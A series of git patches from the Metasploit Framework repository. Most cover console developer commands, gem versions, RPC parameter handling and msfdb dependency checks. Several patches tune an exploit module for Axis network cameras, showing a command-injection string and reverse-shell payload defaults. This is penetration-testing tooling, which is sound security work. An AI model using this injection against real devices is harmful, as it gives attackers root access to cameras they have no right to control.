a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -215,14 +215,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_reload_lib(*args) opts = OptionParser.new do |opts| opts.banner = 'Usage: reload_lib lib/to/reload.rb [...]' - opts.separator 'Reload one or more library files from specified paths.' + opts.separator 'Reload specified Ruby library files.' opts.separator '' opts.on '-h', '--help', 'Help banner.' do return print(opts.help) end - opts.on '-a', '--all', 'Reload all changed files in your current git working tree.' do + opts.on '-a', '--all', 'Reload all* changed files in your current git working tree. + *Excludes modules and non-Ruby files.' do reload_diff_files return end From de47c354a5670caa3bb49c7e06b907de817c2c9d Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 27 Sep 2018 20:27:21 -0500 Subject: [PATCH 103/192] Bumped payload gem version --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 05c7bb2d48..cc5263755d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -18,7 +18,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.47) + metasploit-payloads (= 1.3.52) metasploit_data_models metasploit_payloads-mettle (= 0.4.2) mqtt @@ -164,7 +164,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.47) + metasploit-payloads (1.3.52) metasploit_data_models (3.0.0) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f0cc7d106a..07a78ff4a0 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.47' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.52' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.2' # Needed by msfgui and other rpc components From ab56ac6655f9c3b2375fdb1dc94e5bcd9dbf3518 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 21:49:13 -0500 Subject: [PATCH 104/192] Refactor and clean up reload_lib -a and others --- .../console/command_dispatcher/developer.rb | 108 +++++++++++------- .../ui/console/command_dispatcher/core.rb | 34 +++--- 2 files changed, 84 insertions(+), 58 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 7b5091f8fa..7622bc70e2 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -5,8 +5,9 @@ class Msf::Ui::Console::CommandDispatcher::Developer include Msf::Ui::Console::CommandDispatcher @@irb_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help banner." ], - "-e" => [ true, "Expression to evaluate." ]) + '-h' => [false, 'Help menu.' ], + '-e' => [true, 'Expression to evaluate.'] + ) def initialize(driver) super @@ -18,11 +19,11 @@ class Msf::Ui::Console::CommandDispatcher::Developer def commands { - 'irb' => 'Drop into irb scripting mode', - 'pry' => 'Open a Pry session on the current module or Framework', + 'irb' => 'Open an interactive Ruby shell in the current context', + 'pry' => 'Open the Pry debugger on the current module or Framework', 'edit' => 'Edit the current module or a file with the preferred editor', - 'reload_lib' => 'Reload one or more library files from specified paths', - 'log' => 'Displays framework.log starting at the bottom if possible' + 'reload_lib' => 'Reload Ruby library files from specified paths', + 'log' => 'Display framework.log paged to the end if possible' } end @@ -35,45 +36,53 @@ class Msf::Ui::Console::CommandDispatcher::Developer end # XXX: This will try to reload *any* .rb and break on modules - # If silent is true, errors will not be printed - def reload_file(path, silent=false) - unless File.exist?(path) && path.end_with?('.rb') - print_error("#{path} must exist and be a .rb file") unless silent + def reload_file(path, print_errors: true) + full_path = File.expand_path(path) + + unless File.exist?(full_path) && full_path.end_with?('.rb') + print_error("#{full_path} must exist and be a .rb file") if print_errors return end # The file must exist to reach this, so we try our best here - if path =~ %r{^(?:\./)?modules/} - print_error("Reloading Metasploit modules is not supported (try 'reload')") unless silent + if full_path.start_with?(Msf::Config.module_directory, Msf::Config.user_module_directory) + print_error('Reloading Metasploit modules is not supported (try "reload")') if print_errors return end - print_status("Reloading #{path}") - load path + print_status("Reloading #{full_path}") + load full_path end - def reload_diff_files - output, status = Open3.capture2e(*%w(git diff --name-only *.rb :!modules), chdir: Msf::Config.install_root) - if status.success? - files = output.split("\n") - files.each do |file| - f = File.join(Msf::Config.install_root, file) - reload_file(f, true) - end - else - print_error "Git is not available." + # NOTE: At present, we include *.rb and exclude modules + def reload_changed_files + # Using an array avoids shelling out, so we avoid escaping/quoting + changed_files = %w[git diff --name-only *.rb :!modules] + + output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root) + + unless status.success? + print_error("Git is not available: #{output.chomp}") + return + end + + files = output.split("\n") + + files.each do |file| + f = File.join(Msf::Config.install_root, file) + reload_file(file, print_errors: false) end end def cmd_irb_help - print_line "Usage: irb" + print_line 'Usage: irb' print_line - print_line "Execute commands in a Ruby environment" + print_line 'Open an interactive Ruby shell in the current context.' print @@irb_opts.usage end # - # Goes into IRB scripting mode + # Open an interactive Ruby shell in the current context # def cmd_irb(*args) expressions = [] @@ -90,10 +99,16 @@ class Msf::Ui::Console::CommandDispatcher::Developer end if expressions.empty? - print_status("Starting IRB shell...\n") + print_status('Starting IRB shell...') begin - Rex::Ui::Text::IrbShell.new(binding).run + if active_module + print_status("You are in #{active_module.fullname}\n") + Rex::Ui::Text::IrbShell.new(active_module).run + else + print_status("You are in the \"framework\" object\n") + Rex::Ui::Text::IrbShell.new(framework).run + end rescue print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}") end @@ -103,6 +118,11 @@ class Msf::Ui::Console::CommandDispatcher::Developer driver.input.reset_tab_completion end else + # XXX: No vprint_status here either + if framework.datastore['VERBOSE'].to_s == 'true' + print_status("You are executing expressions in #{binding.receiver}") + end + expressions.each { |expression| eval(expression, binding) } end end @@ -118,12 +138,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_pry_help print_line 'Usage: pry' print_line - print_line 'Open a Pry session on the current module or Framework.' + print_line 'Open the Pry debugger on the current module or Framework.' print_line end # - # Open a Pry session on the current module or Framework + # Open the Pry debugger on the current module or Framework # def cmd_pry(*args) if args.include?('-h') @@ -155,7 +175,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer print_line print_line "Edit the currently active module or a local file with #{local_editor}." print_line 'If a library file is specified, it will automatically be reloaded after editing.' - print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." + print_line 'Otherwise, you can reload the active module with "reload" or "rerun".' print_line end @@ -206,32 +226,32 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_lib_help - cmd_reload_lib '-h' + cmd_reload_lib('-h') end # - # Reload one or more library files from specified paths + # Reload Ruby library files from specified paths # def cmd_reload_lib(*args) - opts = OptionParser.new do |opts| + options = OptionParser.new do |opts| opts.banner = 'Usage: reload_lib lib/to/reload.rb [...]' - opts.separator 'Reload specified Ruby library files.' + opts.separator '' + opts.separator 'Reload Ruby library files from specified paths.' opts.separator '' opts.on '-h', '--help', 'Help banner.' do return print(opts.help) end - opts.on '-a', '--all', 'Reload all* changed files in your current git working tree. + opts.on '-a', '--all', 'Reload all* changed files in your current Git working tree. *Excludes modules and non-Ruby files.' do - reload_diff_files + reload_changed_files return end - end - rest = opts.order(args) - rest.each { |path| reload_file(path) } + files = options.order(args) + files.each { |file| reload_file(file) } end # @@ -244,15 +264,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_log_help print_line 'Usage: log' print_line - print_line 'Displays framework.log starting at the bottom if possible.' - print_line "For full effect, 'setg LogLevel 3' before running modules." + print_line 'Display framework.log paged to the end if possible.' + print_line 'For full effect, "setg LogLevel 3" before running modules.' print_line print_line "Log location: #{File.join(Msf::Config.log_directory, 'framework.log')}" print_line end # - # Displays framework.log starting at the bottom if possible + # Display framework.log paged to the end if possible # def cmd_log(*args) path = File.join(Msf::Config.log_directory, 'framework.log') diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 352f6b6865..83428ec73a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -34,12 +34,14 @@ class Console::CommandDispatcher::Core end @@irb_opts = Rex::Parser::Arguments.new( - '-h' => [false, 'Help banner.'], - '-e' => [true, 'Expression to evaluate.']) + '-h' => [false, 'Help menu.' ], + '-e' => [true, 'Expression to evaluate.'] + ) @@load_opts = Rex::Parser::Arguments.new( - '-l' => [false, 'List all available extensions'], - '-h' => [false, 'Help menu.']) + '-h' => [false, 'Help menu.' ], + '-l' => [false, 'List all available extensions.'] + ) # # List of supported commands. @@ -52,8 +54,8 @@ class Console::CommandDispatcher::Core 'channel' => 'Displays information or control active channels', 'exit' => 'Terminate the meterpreter session', 'help' => 'Help menu', - 'irb' => 'Drop into irb scripting mode', - 'pry' => 'Open a Pry session on the current session', + 'irb' => 'Open an interactive Ruby shell on the current session', + 'pry' => 'Open the Pry debugger on the current session', 'use' => 'Deprecated alias for "load"', 'load' => 'Load one or more meterpreter extensions', 'machine_id' => 'Get the MSF ID of the machine attached to the session', @@ -532,7 +534,7 @@ class Console::CommandDispatcher::Core def cmd_irb_help print_line('Usage: irb') print_line - print_line('Execute commands in a Ruby environment') + print_line('Open an interactive Ruby shell on the current session.') print @@irb_opts.usage end @@ -542,7 +544,7 @@ class Console::CommandDispatcher::Core end # - # Runs the IRB scripting shell + # Open an interactive Ruby shell on the current session # def cmd_irb(*args) expressions = [] @@ -561,12 +563,16 @@ class Console::CommandDispatcher::Core framework = client.framework if expressions.empty? - print_status('Starting IRB shell') - print_status('The "client" variable holds the meterpreter client') - print_line + print_status('Starting IRB shell...') + print_status("You are in the \"client\" (session) object\n") - Rex::Ui::Text::IrbShell.new(binding).run + Rex::Ui::Text::IrbShell.new(client).run else + # XXX: No vprint_status here + if framework.datastore['VERBOSE'].to_s == 'true' + print_status("You are executing expressions in #{binding.receiver}") + end + expressions.each { |expression| eval(expression, binding) } end end @@ -574,12 +580,12 @@ class Console::CommandDispatcher::Core def cmd_pry_help print_line 'Usage: pry' print_line - print_line 'Open a Pry session on the current session.' + print_line 'Open the Pry debugger on the current session.' print_line end # - # Open a Pry session on the current session + # Open the Pry debugger on the current session # def cmd_pry(*args) if args.include?('-h') From 11538bcd4f5716c07da1553df34ae5fcd36d9768 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 22:11:50 -0500 Subject: [PATCH 105/192] Remove pathspec due to vague errors "error: Could not access '*.rb'" is printed when not a repo. We fall back on reload_file's checks, once again. :( --- lib/msf/ui/console/command_dispatcher/developer.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 7622bc70e2..b23bb7f4b1 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -54,10 +54,9 @@ class Msf::Ui::Console::CommandDispatcher::Developer load full_path end - # NOTE: At present, we include *.rb and exclude modules def reload_changed_files # Using an array avoids shelling out, so we avoid escaping/quoting - changed_files = %w[git diff --name-only *.rb :!modules] + changed_files = %w[git diff --name-only] output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root) From 0686c76cd55b89e1a323bc85a09580570d9ebbbf Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 23:21:43 -0500 Subject: [PATCH 106/192] Restore help on empty args for reload_lib --- lib/msf/ui/console/command_dispatcher/developer.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index b23bb7f4b1..7e64665258 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -244,12 +244,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer opts.on '-a', '--all', 'Reload all* changed files in your current Git working tree. *Excludes modules and non-Ruby files.' do - reload_changed_files - return + return reload_changed_files end end + # The remaining unparsed arguments are files files = options.order(args) + + return print(options.help) if files.empty? + files.each { |file| reload_file(file) } end From d29d936d6f2138e288663d6d3f3407f9c7a052bf Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 22:49:40 -0500 Subject: [PATCH 107/192] Bump WfsDelay to 10 for this slow-ass device --- modules/exploits/linux/http/axis_srv_parhand_rce.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index b3f3d68bcb..4b26261fbe 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -58,7 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote ] ], 'DefaultTarget' => 1, - 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'} + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', + 'WfsDelay' => 10 + } )) end From 7a2d0acee6e3202994f961a6daaae2e946a676e4 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 22:51:16 -0500 Subject: [PATCH 108/192] Add basic check method and move rand_srv The .srv can be random each request. --- .../linux/http/axis_srv_parhand_rce.rb | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index 4b26261fbe..bfe25b09df 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -65,6 +65,19 @@ class MetasploitModule < Msf::Exploit::Remote )) end + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => "/index.html/#{rand_srv}" + ) + + if res && res.code == 204 + return CheckCode::Appears + end + + CheckCode::Safe + end + def exploit case target['Type'] when :unix_memory @@ -75,8 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" - send_request_cgi( 'method' => 'POST', 'uri' => "/index.html/#{rand_srv}", @@ -114,4 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote args end + def rand_srv + "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" + end + end From e999b4d81c903d0c675ecce148b7637c488a334f Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 23:18:30 -0500 Subject: [PATCH 109/192] Lower rank to AverageRanking --- modules/exploits/linux/http/axis_srv_parhand_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index bfe25b09df..96cdec73c8 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -5,7 +5,8 @@ class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + # TODO: Find a more stable injection + Rank = AverageRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From 0dab5b622f32c93aeb364c621a5c590f52c7cabd Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 23:27:43 -0500 Subject: [PATCH 110/192] Change default target to cmd/unix --- .../linux/http/axis_srv_parhand_rce.rb | 58 ++++++++++--------- 1 file changed, 32 insertions(+), 26 deletions(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index 96cdec73c8..e9c554c6f2 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -13,12 +13,12 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Axis Network Camera .srv to parhand RCE', - 'Description' => %q{ + 'Name' => 'Axis Network Camera .srv to parhand RCE', + 'Description' => %q{ This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user. }, - 'Author' => [ + 'Author' => [ 'Or Peles', # Vulnerability discovery (VDOO) 'wvu', # Metasploit module 'sinn3r', # Metasploit module @@ -29,40 +29,46 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Lee', # Metasploit module 'Cale Black' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2018-10660'], ['CVE', '2018-10661'], ['CVE', '2018-10662'], ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'], ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf'] ], - 'DisclosureDate' => 'Jun 18 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_ARMLE], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 18 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => { - 'BadChars' => ' ', - 'Encoder' => 'cmd/ifs', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'} - } + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => ' ', + 'Encoder' => 'cmd/ifs', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat-e' + } + }, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + } ] ], - 'DefaultTarget' => 1, - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', - 'WfsDelay' => 10 - } + 'DefaultTarget' => 0, # cmd/unix payloads are more stable + 'DefaultOptions' => {'WfsDelay' => 10} )) end From ee06ec2fda04e302ea382ac1a94fa89adf2a405c Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 27 Sep 2018 23:51:42 -0500 Subject: [PATCH 111/192] Background a subshell to continue execution This provides a more stable injection. I should have tested this sooner. --- modules/exploits/linux/http/axis_srv_parhand_rce.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index e9c554c6f2..bbd7aa9ab0 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -5,8 +5,7 @@ class MetasploitModule < Msf::Exploit::Remote - # TODO: Find a more stable injection - Rank = AverageRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager @@ -67,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote } ] ], - 'DefaultTarget' => 0, # cmd/unix payloads are more stable + 'DefaultTarget' => 1, 'DefaultOptions' => {'WfsDelay' => 10} )) end @@ -102,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote 'action' => 'dbus', 'args' => dbus_send( method: :set_param, - param: "string:root.Time.DST.Enabled string:;#{cmd}" + param: "string:root.Time.DST.Enabled string:;(#{cmd})&" ) } ) From 252d5941865618edefa2b0b64965f0213e771b7c Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 28 Sep 2018 01:24:13 -0500 Subject: [PATCH 112/192] Add ed25519 gem to bundle for ssh_login_pubkey Needed for that key type. --- Gemfile.lock | 2 ++ metasploit-framework.gemspec | 1 + 2 files changed, 3 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index 3d7a9ebac5..5ec84c2490 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -10,6 +10,7 @@ PATH bcrypt_pbkdf bit-struct dnsruby + ed25519 faker filesize jsobfu @@ -123,6 +124,7 @@ GEM dnsruby (1.61.2) addressable (~> 2.5) docile (1.3.1) + ed25519 (1.2.4) erubis (2.7.0) eventmachine (1.2.7) factory_bot (4.11.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 7714ef792f..19a062549a 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -132,6 +132,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' spec.add_runtime_dependency 'bcrypt_pbkdf' + spec.add_runtime_dependency 'ed25519' spec.add_runtime_dependency 'ruby_smb' # From 60bd00ee5bf55712b6e37d330c2f99e41e737254 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Fri, 28 Sep 2018 10:51:10 -0400 Subject: [PATCH 113/192] Move prepare_params method to v1.0 RpcCommand The method was created to support RPC v1.0 (v10) processing and should not be necessary for future RPC versions. --- lib/msf/core/rpc/json/rpc_command.rb | 31 ----------------------- lib/msf/core/rpc/json/v1_0/rpc_command.rb | 28 ++++++++++++++++++++ 2 files changed, 28 insertions(+), 31 deletions(-) diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb index a995940a72..e23c3948be 100644 --- a/lib/msf/core/rpc/json/rpc_command.rb +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -40,7 +40,6 @@ module Msf::RPC::JSON end ::Timeout.timeout(@execute_timeout) do - params = prepare_params(params) if params.nil? return @methods[method].call() elsif params.is_a?(Array) @@ -50,35 +49,5 @@ module Msf::RPC::JSON end end end - - private - - # Prepare params for use by RPC methods by converting all hashes - # to use strings for their names (keys). - # @param params [Array, Hash] parameters for the RPC call - # @returns [Array, Hash] modified parameters - def prepare_params(params) - clean_params = params - if params.is_a?(Array) - clean_params = params.map do |p| - if p.is_a?(Hash) - stringify_names(p) - else - p - end - end - elsif params.is_a?(Hash) - clean_params = stringify_names(params) - end - - clean_params - end - - # Stringify the names (keys) in hash. - # @param hash [Hash] input hash - # @returns [Hash] a new hash with strings for the keys. - def stringify_names(hash) - JSON.parse(JSON.dump(hash), symbolize_names: false) - end end end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb index 12f058ec15..293e37ad08 100644 --- a/lib/msf/core/rpc/json/v1_0/rpc_command.rb +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -106,6 +106,34 @@ module Msf::RPC::JSON handler end + # Prepare params for use by RPC methods by converting all hashes + # to use strings for their names (keys). + # @param params [Array, Hash] parameters for the RPC call + # @returns [Array, Hash] modified parameters + def prepare_params(params) + clean_params = params + if params.is_a?(Array) + clean_params = params.map do |p| + if p.is_a?(Hash) + stringify_names(p) + else + p + end + end + # elsif params.is_a?(Hash) + # clean_params = stringify_names(params) + end + + clean_params + end + + # Stringify the names (keys) in hash. + # @param hash [Hash] input hash + # @returns [Hash] a new hash with strings for the keys. + def stringify_names(hash) + JSON.parse(JSON.dump(hash), symbolize_names: false) + end + # Perform custom post processing of the execute result data. # @param result [Object] the method's return value # @param method [String] the RPC method name From 5f5b3344937860d79ef8beb991982ca1f1087b0c Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Fri, 28 Sep 2018 11:11:18 -0400 Subject: [PATCH 114/192] Call keyword argument methods with params hash --- lib/msf/core/rpc/json/rpc_command.rb | 2 +- lib/msf/core/rpc/json/v1_0/rpc_command.rb | 11 +++++------ 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb index e23c3948be..aa650393ea 100644 --- a/lib/msf/core/rpc/json/rpc_command.rb +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -45,7 +45,7 @@ module Msf::RPC::JSON elsif params.is_a?(Array) return @methods[method].call(*params) else - return @methods[method].call(params) + return @methods[method].call(**params) end end end diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb index 293e37ad08..f1032176fb 100644 --- a/lib/msf/core/rpc/json/v1_0/rpc_command.rb +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -72,7 +72,7 @@ module Msf::RPC::JSON elsif params.is_a?(Array) return handler.send(method_name, *params) else - return handler.send(method_name, params) + return handler.send(method_name, **params) end end end @@ -107,9 +107,10 @@ module Msf::RPC::JSON end # Prepare params for use by RPC methods by converting all hashes - # to use strings for their names (keys). - # @param params [Array, Hash] parameters for the RPC call - # @returns [Array, Hash] modified parameters + # inside of Arrays to use strings for their names (keys). + # @param params [Object] parameters for the RPC call + # @returns [Object] If params is an Array all hashes it contains will be + # modified; otherwise, the object will simply pass-through. def prepare_params(params) clean_params = params if params.is_a?(Array) @@ -120,8 +121,6 @@ module Msf::RPC::JSON p end end - # elsif params.is_a?(Hash) - # clean_params = stringify_names(params) end clean_params From 55cf17bf1576793f440280608cebd1f1dc22ce75 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Fri, 28 Sep 2018 13:41:03 -0400 Subject: [PATCH 115/192] Add check for required commands --- msfdb | 44 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/msfdb b/msfdb index 37ae360f95..1e6e0489f7 100755 --- a/msfdb +++ b/msfdb @@ -906,6 +906,46 @@ def invoke_command(commands, component, command) end end +# Searches the user's path for the executable file that would be run had the +# command actually been invoked. +# @param cmd [String] command name +# @param return_all [Boolean] If true, returns a list of all instances of +# executable found (instead of just the first one). Default: false. +# @return [Array] instance or instances of executable found based on return_all, or nil. +def which(cmd, return_all: false) + return nil if cmd.empty? + + found = [] + ENV['PATH'].split(File::PATH_SEPARATOR).each do |path| + exe_file = File.join(path, cmd) + found << exe_file if !File.directory?(exe_file) && File.executable?(exe_file) + break if !return_all && found.size > 0 + end + + return found.empty? ? nil : found +end + +def has_requirements + ret_val = true + postgresql_cmds = %w(psql pg_ctl initdb createdb) + other_cmds = %w(bundle thin) + missing_msg = 'Missing requirement: %s does not appear to be installed or is not in the environment path' + + unless postgresql_cmds.all? { |cmd| !which(cmd).nil? } + puts missing_msg % { name: 'PostgreSQL' } + ret_val = false + end + + other_cmds.each do |cmd| + if which(cmd).nil? + puts missing_msg % { name: "'#{cmd}'" } + ret_val = false + end + end + + ret_val +end + if $PROGRAM_NAME == __FILE__ @@ -915,6 +955,10 @@ if $PROGRAM_NAME == __FILE__ abort end + unless has_requirements + abort + end + # map component commands to methods commands = { database: { From c3a2b72836555ffa91eae4d1e3a1adf6cc3dc38d Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Fri, 28 Sep 2018 14:48:23 -0400 Subject: [PATCH 116/192] Use Msf::Util::Helper.which method --- msfdb | 34 +++++++++++++--------------------- 1 file changed, 13 insertions(+), 21 deletions(-) diff --git a/msfdb b/msfdb index 1e6e0489f7..1e31070e62 100755 --- a/msfdb +++ b/msfdb @@ -12,6 +12,17 @@ require 'sysrandom/securerandom' require 'uri' require 'yaml' +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'msf/util/helper' + + @script_name = File.basename(__FILE__) @framework = File.expand_path(File.dirname(__FILE__)) @@ -906,38 +917,19 @@ def invoke_command(commands, component, command) end end -# Searches the user's path for the executable file that would be run had the -# command actually been invoked. -# @param cmd [String] command name -# @param return_all [Boolean] If true, returns a list of all instances of -# executable found (instead of just the first one). Default: false. -# @return [Array] instance or instances of executable found based on return_all, or nil. -def which(cmd, return_all: false) - return nil if cmd.empty? - - found = [] - ENV['PATH'].split(File::PATH_SEPARATOR).each do |path| - exe_file = File.join(path, cmd) - found << exe_file if !File.directory?(exe_file) && File.executable?(exe_file) - break if !return_all && found.size > 0 - end - - return found.empty? ? nil : found -end - def has_requirements ret_val = true postgresql_cmds = %w(psql pg_ctl initdb createdb) other_cmds = %w(bundle thin) missing_msg = 'Missing requirement: %s does not appear to be installed or is not in the environment path' - unless postgresql_cmds.all? { |cmd| !which(cmd).nil? } + unless postgresql_cmds.all? { |cmd| !Msf::Util::Helper.which(cmd).nil? } puts missing_msg % { name: 'PostgreSQL' } ret_val = false end other_cmds.each do |cmd| - if which(cmd).nil? + if Msf::Util::Helper.which(cmd).nil? puts missing_msg % { name: "'#{cmd}'" } ret_val = false end From a98af45c13c5f1faa853f50e1ec608ec452083bb Mon 